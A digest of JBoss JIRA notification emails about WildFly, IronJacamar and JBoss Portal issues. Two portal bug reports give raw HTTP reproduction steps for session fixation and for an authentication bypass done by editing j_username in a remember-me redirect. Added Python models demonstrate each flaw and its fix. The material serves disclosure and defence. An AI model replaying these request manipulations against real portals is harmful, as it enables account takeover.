[JBoss JIRA] (WFLY-2426) Easily accessible static information describing the release
by Rob Stryker (JIRA)
[ https://issues.jboss.org/browse/WFLY-2426?page=com.atlassian.jira.plugin.... ]
Rob Stryker commented on WFLY-2426:
-----------------------------------
How would this change for distributions that have 1 base and multiple layers installed on it? I've lost the link to the community page with the matrix, but it's my understanding that distributions aren't limited to one layer and that some may have multiple layers.
Would this file then be updated somehow (and how?) if a distribution contained 1 layer but was upgraded to have a second layer?
Is the layer tag assuming that there's only 1 layer, or only 1 primary layer? Is it possible that there might be multiple layers without any one being "in charge"? If that's possible, then it seems a mistake to assume only 1 layer.
> Easily accessible static information describing the release
> -----------------------------------------------------------
>
> Key: WFLY-2426
> URL: https://issues.jboss.org/browse/WFLY-2426
> Project: WildFly
> Issue Type: Feature Request
> Security Level: Public(Everyone can see)
> Components: Server
> Reporter: Brian Stansberry
> Assignee: Ondrej Zizka
> Labels: build, integration, jbds, layers, version
> Fix For: 8.0.0.CR1
>
>
> Tools that work with a WF installation need to identify what they are working with before they can launch or interact with the server. Specifically, they need to know the version. They likely need to know other information as well, such as the name of the software; e.g. whether it is WildFly itself or some other project based on WildFly.
> This information should be provided in standard format in a text file in a standard location in the distribution (probably in bin). The text file should be generated as part of the build.
> The solution to this issue should consider the requirements of other "identities" that may be based on WildFly. See [1] for the definition of an identity.
> The solution to this issue should consider the needs of products based on WildFly and other non-product identities. For example, can the existing product.conf contain the necessary information for a product, with some differently named but largely equivalent file being used in a non-product distribution?
> The solution to this issue should consider the implications for the patching tool.
> [1] https://community.jboss.org/wiki/LayeredDistributionsAndModulePathOrganiz... for
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
[JBoss JIRA] (JBPORTAL-2495) Session Fixation
by Wells guo (JIRA)
Wells guo created JBPORTAL-2495:
-----------------------------------
Summary: Session Fixation
Key: JBPORTAL-2495
URL: https://issues.jboss.org/browse/JBPORTAL-2495
Project: JBoss Portal
Issue Type: Bug
Security Level: Public (Everyone can see)
Environment: EPP 5.1.0
Reporter: Wells guo
Hi,
Our security team reported a Session Fixation issue: after a user logs into the project on machine A, if I copy the JSESSIONID cookie to machine B, the user on machine B can view the private content of the project.
So do you have any advice about this issue? Thanks!
Steps to Reproduce:
1. Get the cookie from the browser on machine A.
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=DWQ6ztJvJeEZA77uVzE3Dg__
^^^^^^^^^^^^^^^^^^^^^^^^
Connection: keep-alive
Cache-Control: max-age=0
2. Clear cookie of browser on machine B.
3. Request the project homepage on machine B and modify the Set-Cookie header in the response to A's cookie.
GET XXX HTTP/1.1
Host: XXXXXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 15 Aug 2013 10:45:23 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=DWQ6ztJvJeEZA77uVzE3Dg__; Path=/; Secure
^^^^^^^^^^^^^^^^^^^^^^^^^
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 24896
4. Log in in the browser on machine B.
Actual results:
Both machine A and machine B log into the project successfully.
Expected results:
Machine A should not log in without providing any credentials.
Additional info:
An attacker can modify a user's cookie by sending a malicious link to the user.
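The scenario in the report above (an attacker plants a session ID in the victim's browser, the victim logs in, and the attacker replays that ID from another machine) only works when the container keeps the same JSESSIONID across authentication. The following Python model is an added example, not JBoss Portal or JBoss Web code; the session table, the sample credential and the `rotate_on_login` switch are assumptions made for illustration. It runs the attack against a server that preserves the pre-login ID and against one that mints a fresh ID before binding the principal.

```python
"""Toy model of a servlet session table, added to show why the session ID must be
rotated when the user authenticates. Not JBoss Portal / JBoss Web code."""
import secrets
from typing import Dict, Optional


class PortalModel:
    def __init__(self, rotate_on_login: bool):
        self.rotate_on_login = rotate_on_login
        # session id -> principal (None = anonymous). Assumed layout, not the container's.
        self.sessions: Dict[str, Optional[str]] = {}
        self.passwords = {"alice": "s3cret"}  # constructed sample credential

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = None
        return sid

    def login(self, sid: str, user: str, password: str) -> str:
        """Authenticate and return the session ID the browser must use from now on."""
        if sid not in self.sessions:
            sid = self.new_session()
        if self.passwords.get(user) != password:
            raise PermissionError("bad credentials")
        if self.rotate_on_login:
            # Hardened: discard the pre-authentication ID (the one an attacker could
            # have planted) and mint a fresh one before binding the principal to it.
            del self.sessions[sid]
            sid = self.new_session()
        self.sessions[sid] = user
        return sid

    def private_page(self, sid: str) -> str:
        """Return the status line a request with this session ID would get."""
        user = self.sessions.get(sid)
        if user is None:
            return "302 /portal/login"
        return f"200 private content for {user}"


def fixation_attack(server: PortalModel) -> bool:
    """Attacker obtains a session ID, gets the victim's browser to use it (e.g. via a
    malicious link), the victim logs in, and the attacker replays the planted ID from
    another machine. Returns True if the planted ID now yields the private content."""
    planted = server.new_session()
    server.login(planted, "alice", "s3cret")  # victim authenticates with the planted ID
    return server.private_page(planted).startswith("200")


if __name__ == "__main__":
    print("session preserved across login, attack works:",
          fixation_attack(PortalModel(rotate_on_login=False)))
    print("session rotated on login, attack works:",
          fixation_attack(PortalModel(rotate_on_login=True)))
```

The practical check is the same as the model: capture JSESSIONID before the login POST and after it; if the two values are identical, the container did not rotate the session. In Servlet 3.1 and later the rotation is `request.changeSessionId()`; the `X-Powered-By: Servlet 2.5` header in the report indicates a container without that method, where the equivalent is to call `session.invalidate()` and then `request.getSession(true)` before storing the authenticated principal.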
[JBoss JIRA] (JBPORTAL-2496) bypass authentication
by Wells guo (JIRA)
Wells guo created JBPORTAL-2496:
-----------------------------------
Summary: bypass authentication
Key: JBPORTAL-2496
URL: https://issues.jboss.org/browse/JBPORTAL-2496
Project: JBoss Portal
Issue Type: Bug
Security Level: Public (Everyone can see)
Environment: EPP 5.1.0
Reporter: Wells guo
Steps to Reproduce:
1. Log into our portal project with the correct username and password
POST /portal/login HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX/home?portal:componentId=UIPortal&portal:action=Logout
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
initialURI=%2Fportal%2Fprivate%2Fxxxx0%2Fhome&username=userA&password=xxxx
2. Get a 302 response and open the /portal/private/project/home page
HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:19:48 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Location: http://XXXX//home
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
GET /portal/private/xxxx/home HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX//home?portal:componentId=UIPortal&portal:action=Logout
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive
3. Get a 302 response again, which redirects to the security check page with the username; modify the username to someone else who is logged in.
Original message:
HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:29:42 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userA&j_password=rememberme1447024746
^^^^^^^^^^^^^^^^^
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Modified message:
HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:29:42 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userB&j_pass...
^^^^^^^^^^^^^^^^
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
4. Send a GET request for the page in the "Location" of step 3, which has username "userB"
GET /portal/private/xxx/j_security_check?j_username=userB&j_password=rememberme1447024746 HTTP/1.1
^^^^^^^^^^^^^^^^^^
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX/portal/private/xxxx/home?portal:componentId=UIPortal&portal:a...
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive
5. Get a response with code 302 and a redirect to the home page (attachment1).
6. Click the content tab on the home page; it will now display as logged in with "userB", and operations can be performed as userB too.
Actual results:
Authentication is successfully bypassed.
Expected results:
Should not log into the project as "userB" successfully.
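The redirect in the report above carries `j_username=userA&j_password=rememberme1447024746`, and changing only `j_username` to `userB` was enough to become userB: the remember-me credential was accepted without being tied to the user it was issued for. The Python below is an added example, not JBoss Portal's code, modelling both behaviours. The token format, the HMAC-over-`user|expiry` binding, the server-side key and the constructed timestamps are all assumptions made for illustration.

```python
"""Toy model of a remember-me credential, added to show why the token must be bound
to the principal it was issued for. Not JBoss Portal code."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple


class RememberMeModel:
    def __init__(self, key: bytes, bind_to_user: bool):
        self.key = key                    # server-side secret (assumed)
        self.bind_to_user = bind_to_user
        self.issued: Dict[str, Tuple[str, int]] = {}  # token -> (user, expiry)

    def issue(self, user: str, expires: int) -> str:
        if self.bind_to_user:
            # Hardened: the token embeds its expiry and an HMAC over user|expiry, so it
            # can only validate for the username it was minted for.
            mac = hmac.new(self.key, f"{user}|{expires}".encode(), hashlib.sha256).hexdigest()
            return f"rememberme{expires}.{mac}"
        # Vulnerable: opaque token recorded server-side; the record is not consulted for
        # the user on presentation (the behaviour the report shows).
        token = f"rememberme{secrets.randbelow(10**10)}"
        self.issued[token] = (user, expires)
        return token

    def authenticate(self, j_username: str, j_password: str, now: int) -> Optional[str]:
        """Return the authenticated principal, or None if the credential is rejected."""
        if not j_password.startswith("rememberme"):
            return None
        if self.bind_to_user:
            try:
                exp_str, mac = j_password[len("rememberme"):].split(".", 1)
                expires = int(exp_str)
            except ValueError:
                return None
            expected = hmac.new(self.key, f"{j_username}|{expires}".encode(),
                                hashlib.sha256).hexdigest()
            # Constant-time compare; a token minted for userA fails for userB.
            if now > expires or not hmac.compare_digest(mac, expected):
                return None
            return j_username
        record = self.issued.get(j_password)
        if record is None or now > record[1]:
            return None
        return j_username  # BUG modelled: trusts the username from the request


def swap_username_attack(model: RememberMeModel, now: int = 1_376_000_000) -> Optional[str]:
    """Issue a token for userA, then present it with j_username=userB, as in the report.
    Returns the principal the server accepted, or None. `now` is a constructed timestamp."""
    token = model.issue("userA", expires=now + 86_400)
    return model.authenticate("userB", token, now)


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    print("unbound token, logged in as:", swap_username_attack(RememberMeModel(key, False)))
    print("bound token, logged in as:  ", swap_username_attack(RememberMeModel(key, True)))
```

Binding the token to the principal closes the username swap, but note a second point visible in the same Location header: the credential travels in a GET query string, where it ends up in access logs, proxy logs and Referer headers. Fixing the binding does not address that; the credential should be carried in a cookie or POST body instead.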
[JBoss JIRA] (JBJCA-1124) Eclipse plugin update for resource adapter 1.1
by Lin Gao (JIRA)
[ https://issues.jboss.org/browse/JBJCA-1124?page=com.atlassian.jira.plugin... ]
Lin Gao updated JBJCA-1124:
---------------------------
Description:
Update the Eclipse plugin with the new features included in the resource adapter 1.1 schema, which include:
* an id attribute in resource-adapter
* work manager security configuration
* initial-pool-size for the pool configuration
* capacity for the pool configuration
* sharable and enlistment for MCF
was:
Update the Eclipse plugin with the new features included in the resource adapter 1.1 schema, which include:
* an id attribute in resource-adapter
* work manager security configuration
* initial-pool-size for the pool configuration
* capacity for the pool configuration
> Eclipse plugin update for resource adapter 1.1
> ----------------------------------------------
>
> Key: JBJCA-1124
> URL: https://issues.jboss.org/browse/JBJCA-1124
> Project: IronJacamar
> Issue Type: Task
> Components: Eclipse
> Reporter: Lin Gao
> Assignee: Lin Gao
>
> Update the Eclipse plugin with the new features included in the resource adapter 1.1 schema, which include:
> * an id attribute in resource-adapter
> * work manager security configuration
> * initial-pool-size for the pool configuration
> * capacity for the pool configuration
> * sharable and enlistment for MCF
[JBoss JIRA] (WFLY-2623) Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
by Amos Feng (JIRA)
[ https://issues.jboss.org/browse/WFLY-2623?page=com.atlassian.jira.plugin.... ]
Amos Feng updated WFLY-2623:
----------------------------
Description:
https://bugzilla.redhat.com/show_bug.cgi?id=1036739
The process-id mechanism cannot be changed from process-id-uuid to process-id-socket-binding.
The following ERROR occurred at JBoss start-up:
{noformat}
ERROR [org.jboss.as.controller.management-operation] (ServerService Thread Pool -- 44) JBAS014613: Operation ("add") failed - address: ([("subsystem" => "transactions")]) - failure description: "JBAS014746: process-id-uuid may not be null"
{noformat}
The root cause is that it does not check whether PROCESS_ID_UUID is defined when booting the coreEnvironment service in TransactionSubsystemAdd.
was:
The process-id mechanism cannot be changed from process-id-uuid to process-id-socket-binding.
The following ERROR occurred at JBoss start-up:
{noformat}
ERROR [org.jboss.as.controller.management-operation] (ServerService Thread Pool -- 44) JBAS014613: Operation ("add") failed - address: ([("subsystem" => "transactions")]) - failure description: "JBAS014746: process-id-uuid may not be null"
{noformat}
The root cause is that it does not check whether PROCESS_ID_UUID is defined when booting the coreEnvironment service in TransactionSubsystemAdd.
> Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
> -------------------------------------------------------------------------------------------------------
>
> Key: WFLY-2623
> URL: https://issues.jboss.org/browse/WFLY-2623
> Project: WildFly
> Issue Type: Bug
> Security Level: Public(Everyone can see)
> Components: Transactions
> Reporter: Amos Feng
> Assignee: Amos Feng
> Labels: transaction
> Fix For: 8.0.0.CR1
>
>
> https://bugzilla.redhat.com/show_bug.cgi?id=1036739
> The process-id mechanism cannot be changed from process-id-uuid to process-id-socket-binding.
> The following ERROR occurred at JBoss start-up:
> {noformat}
> ERROR [org.jboss.as.controller.management-operation] (ServerService Thread Pool -- 44) JBAS014613: Operation ("add") failed - address: ([("subsystem" => "transactions")]) - failure description: "JBAS014746: process-id-uuid may not be null"
> {noformat}
> The root cause is that it does not check whether PROCESS_ID_UUID is defined when booting the coreEnvironment service in TransactionSubsystemAdd.
[JBoss JIRA] (WFLY-2623) Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
by Amos Feng (JIRA)
[ https://issues.jboss.org/browse/WFLY-2623?page=com.atlassian.jira.plugin.... ]
Amos Feng updated WFLY-2623:
----------------------------
Labels: transaction (was: )
> Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
> -------------------------------------------------------------------------------------------------------
>
> Key: WFLY-2623
> URL: https://issues.jboss.org/browse/WFLY-2623
> Project: WildFly
> Issue Type: Bug
> Security Level: Public(Everyone can see)
> Components: Transactions
> Reporter: Amos Feng
> Assignee: Amos Feng
> Labels: transaction
> Fix For: 8.0.0.CR1
>
>
> The process-id mechanism cannot be changed from process-id-uuid to process-id-socket-binding.
> The following ERROR occurred at JBoss start-up:
> {noformat}
> ERROR [org.jboss.as.controller.management-operation] (ServerService Thread Pool -- 44) JBAS014613: Operation ("add") failed - address: ([("subsystem" => "transactions")]) - failure description: "JBAS014746: process-id-uuid may not be null"
> {noformat}
> The root cause is that it does not check whether PROCESS_ID_UUID is defined when booting the coreEnvironment service in TransactionSubsystemAdd.
[JBoss JIRA] (WFLY-2623) Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
by Amos Feng (JIRA)
Amos Feng created WFLY-2623:
-------------------------------
Summary: Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
Key: WFLY-2623
URL: https://issues.jboss.org/browse/WFLY-2623
Project: WildFly
Issue Type: Bug
Security Level: Public (Everyone can see)
Components: Transactions
Reporter: Amos Feng
Assignee: Amos Feng
Fix For: 8.0.0.CR1
The process-id mechanism cannot be changed from process-id-uuid to process-id-socket-binding.
The following ERROR occurred at JBoss start-up:
{noformat}
ERROR [org.jboss.as.controller.management-operation] (ServerService Thread Pool -- 44) JBAS014613: Operation ("add") failed - address: ([("subsystem" => "transactions")]) - failure description: "JBAS014746: process-id-uuid may not be null"
{noformat}
The root cause is that it does not check whether PROCESS_ID_UUID is defined when booting the coreEnvironment service in TransactionSubsystemAdd.